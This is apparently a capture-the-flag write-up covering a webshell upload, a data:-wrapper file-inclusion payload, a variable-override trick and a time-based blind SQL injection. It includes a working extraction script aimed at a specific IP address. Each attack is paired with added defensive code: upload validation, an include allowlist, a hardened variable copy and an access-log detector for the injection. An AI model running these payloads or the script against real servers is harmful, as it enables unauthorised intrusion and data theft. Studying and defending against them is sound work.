check

File upload

Upload a one-sentence webshell

Connect with AntSword

The flag is in the root directory
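The upload step works because the server accepts a file with an executable extension and later serves it. As an added example (not the challenge's code), the checks below reject a `.php` upload, a double extension such as `shell.php.png`, a body whose magic bytes do not match the declared extension, and a PHP open tag embedded in an image; the allowlist, magic bytes and function names are constructed for this example.

```python
import os
import re
import secrets

# Constructed policy: extension -> magic bytes the file body must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Base name may contain only letters, digits, '_' and '-': no second dot, no slash.
SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# '<?php' or '<?=' anywhere in the body (case-insensitive).
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename: str, content: bytes):
    """Return (accepted, reason) for a client-supplied filename and file body."""
    base, dot, ext = filename.rpartition(".")
    if not dot or not SAFE_BASE.match(base):
        return False, "bad filename"            # catches a.php.png, ../x, empty base
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"   # .php, .phtml, .phar, ... all fail here
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if PHP_TAG.search(content):
        return False, "embedded PHP tag"        # polyglot image + PHP payload
    return True, "ok"


def stored_path(upload_dir: str, filename: str) -> str:
    """Server-chosen random name; the client's name is never reused on disk."""
    ext = filename.rpartition(".")[2].lower()
    return os.path.join(upload_dir, secrets.token_hex(16) + "." + ext)


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed minimal PNG-like body
    print(check_upload("shell.php", b"<?php echo 1; ?>"))
    print(check_upload("shell.php.png", png))
    print(check_upload("pic.png", png + b"<?php echo 1; ?>"))
    print(check_upload("pic.png", png))
    print(stored_path("/srv/uploads", "pic.png"))
```

These checks only reduce the attack surface; the upload directory should additionally sit outside the web root or have script execution disabled, so that even a file that slips through is never run.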

GET parameters


?text=data:text/plain,welcome to the beijing&file=/flag&password=r
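The payload above satisfies a content check with the `data:` stream wrapper and then points the `file` parameter at the absolute path `/flag`. As an added example (not the challenge's code; the allowlist, directory and function names are constructed), this is how a file parameter can be validated before it reaches an include: stream wrappers, absolute paths and traversal are rejected, and only names from a fixed allowlist resolve to a path under the page directory.

```python
import os
from urllib.parse import unquote

# Constructed allowlist of page names the include is permitted to load.
ALLOWED_PAGES = {"home", "about", "contact"}
# PHP stream wrappers that must never reach include()/file_get_contents().
STREAM_PREFIXES = ("data:", "php:", "file:", "phar:", "zip:", "glob:", "expect:",
                   "http:", "https:", "ftp:", "compress.")


def normalize(param: str) -> str:
    """URL-decode twice so that %252e-style nesting cannot hide characters."""
    value = param
    for _ in range(2):
        value = unquote(value)
    return value


def reject_reason(param: str):
    """Return why a file= value is rejected, or None if it passes every check."""
    value = normalize(param)
    lowered = value.lower()
    if "\x00" in value:
        return "null byte"
    if lowered.startswith(STREAM_PREFIXES) or "://" in lowered:
        return "stream wrapper"
    if value.startswith(("/", "\\")) or ".." in value:
        return "absolute path or traversal"
    if value not in ALLOWED_PAGES:
        return "not in allowlist"
    return None


def resolve_include(param: str, base_dir: str):
    """Map an accepted page name to <base_dir>/<name>.php, or None."""
    if reject_reason(param) is not None:
        return None
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, normalize(param) + ".php"))
    # Belt and braces: the resolved path must still sit under the page directory.
    if os.path.commonpath([root, path]) != root:
        return None
    return path


if __name__ == "__main__":
    for candidate in ("/flag", "data:text/plain,welcome to the beijing",
                      "php://filter/read=convert.base64-encode/resource=index.php",
                      "../../etc/passwd", "admin", "home"):
        print(repr(candidate), "->", reject_reason(candidate))
    print(resolve_include("home", "/srv/pages"))
```

With an allowlist in place the wrapper and traversal checks are technically redundant, but keeping them gives a distinct rejection reason that is worth logging: a `data:` or `php://` value in a page parameter is a reliable indicator of probing.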

Variable override


Assign the value of flag to a, then set flag = a, and output flag.

?a=flag&flag=a
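The writeup does not show the challenge source, so the exact check being bypassed is unknown. As an added example (not the challenge's code), the emulation below assumes the common PHP idiom `foreach ($_GET as $k => $v) { $$k = $$v; }` with `$flag` preset, and shows why the query string `a=flag&flag=a` aliases the secret while any request can also clobber it; the hardened variant copies only allow-listed parameters by value and never lets the request choose variable names. The secret value and the allowlist are constructed.

```python
from urllib.parse import parse_qsl

SECRET = "flag{constructed-sample}"   # constructed stand-in for the real flag


def vulnerable(query):
    """Emulates: $flag = SECRET; foreach ($_GET as $k => $v) { $$k = $$v; }
    query is a list of (key, value) pairs in query-string order, as PHP's $_GET is.
    Reading an undefined PHP variable yields null, modelled here as None."""
    scope = {"flag": SECRET}
    for k, v in query:
        scope[k] = scope.get(v)    # variable named k receives the value of variable named v
    return scope


def hardened(query):
    """Copy only allow-listed parameters, by value, into their own dict.
    Request data can never name or overwrite a server-side variable."""
    allowed = {"page", "lang"}     # constructed allowlist
    scope = {"flag": SECRET, "input": {}}
    for k, v in query:
        if k in allowed:
            scope["input"][k] = v
    return scope


if __name__ == "__main__":
    q = parse_qsl("a=flag&flag=a")
    print(vulnerable(q))           # a and flag both hold the secret
    print(vulnerable(parse_qsl("flag=zzz")))   # flag clobbered to None
    print(hardened(q))             # flag untouched, nothing copied
```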

SQL

Time-based blind injection to enumerate the database

id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(2),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(3),1)#
?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1))),{},sleep(3),1)#
import requests
import time

url = "http://43.143.155.90:9801/index.php"
flag = ""

# Guess the flag one character at a time: for each position i, try every
# printable byte j; a response delayed by sleep(3) means the guess was right.
for i in range(1, 50):
    for j in range(96, 127):
        a = ("1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1)))={}"
             ",sleep(3),1)#").format(i, j)
        data = {'id': a}
        print(data)

        start_time = time.time()
        r = requests.post(url=url, data=data)
        end_time = time.time()
        sec = end_time - start_time
        time.sleep(1)            # pause so the next timing is not skewed
        if sec >= 2:             # delayed response: this byte is correct
            flag = flag + chr(j)
            print(flag)
            break
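From the defender's side, the injection above leaves two traces: request parameters carrying `sleep(`, `if(`, `ascii(substr(` and `/**/` padding (with keywords doubled to survive a strip-once filter), and a burst of requests whose response time clusters around the sleep value. As an added example (not part of the writeup), the detector below parses constructed access-log lines, normalises the query string, scores it against those signals, and reports an IP once two of its flagged requests were slow. The log lines use the GET form of the payloads shown above (the writeup's script POSTs, and a POST body would not appear in a standard access log) with a constructed response-time field in milliseconds as the last column.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample: combined format plus response time (ms) as last field.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jan/2024:20:27:26 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512 12
10.0.0.9 - - [06/Jan/2024:20:27:30 +0800] "GET /index.php?id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)%23 HTTP/1.1" 200 512 3021
10.0.0.9 - - [06/Jan/2024:20:27:35 +0800] "GET /index.php?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),1,1)))=102,sleep(3),1)%23 HTTP/1.1" 200 512 3015
10.0.0.9 - - [06/Jan/2024:20:27:40 +0800] "GET /index.php?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),1,1)))=103,sleep(3),1)%23 HTTP/1.1" 200 512 14
10.0.0.7 - - [06/Jan/2024:20:28:01 +0800] "GET /index.php?id=2 HTTP/1.1" 200 498 2990
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\d+) (?P<ms>\d+)$')
COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Content signals typical of a time-based blind probe.
SIGNALS = {
    "sleep(": re.compile(r"\bsleep\s*\("),
    "benchmark(": re.compile(r"\bbenchmark\s*\("),
    "if(": re.compile(r"\bif\s*\("),
    "ascii(substr": re.compile(r"\bascii\s*\(\s*substr"),
    "group_concat(": re.compile(r"\bgroup_concat\s*\("),
    "information_schema": re.compile(r"\binformation_schema\b"),
}
# Keywords a strip-once filter would remove; a token that becomes one of these
# after deleting one copy of the keyword was doubled on purpose (anandd -> and).
KEYWORDS = {"and", "or", "union", "select", "where", "from", "sleep", "information_schema"}


def decode(query: str) -> str:
    s = query
    for _ in range(2):            # double-decode to defeat %2520-style nesting
        s = unquote_plus(s)
    return s.lower()


def matched_signals(query: str):
    """Return the list of signal names that fire on one raw query string."""
    raw = decode(query)
    stripped = re.sub(r"\s+", " ", COMMENT.sub(" ", raw))
    hits = [name for name, rx in SIGNALS.items() if rx.search(stripped)]
    if raw.count("/**/") >= 2:
        hits.append("comment-padding")
    for tok in set(re.findall(r"[a-z_]+", stripped)):
        if any(kw in tok and tok.replace(kw, "", 1) in KEYWORDS for kw in KEYWORDS):
            hits.append("keyword-splice")
            break
    return hits


def analyze(log_text: str, slow_ms: int = 2000, min_slow_hits: int = 2):
    """Return (alerts, suspects): one alert per flagged request, and the set of
    IPs with at least min_slow_hits flagged requests slower than slow_ms."""
    alerts, slow_by_ip = [], defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        signals = matched_signals(rec["path"].partition("?")[2])
        if not signals:
            continue              # a slow request alone (10.0.0.7) is not an alert
        ms = int(rec["ms"])
        if ms >= slow_ms:
            slow_by_ip[rec["ip"]] += 1
        alerts.append({"ip": rec["ip"], "ts": rec["ts"], "ms": ms, "signals": signals})
    suspects = {ip for ip, n in slow_by_ip.items() if n >= min_slow_hits}
    return alerts, suspects


if __name__ == "__main__":
    found, ips = analyze(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["ms"], "ms", a["signals"])
    print("suspects:", ips)
```

The third flagged request is fast (14 ms) yet still alerted: that is the false branch of the `if(..., sleep(3), 1)` conditional, and the alternation of slow and fast responses from one client with identical query shapes is itself a strong indicator of character-by-character extraction.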

SSTI

Deserialization
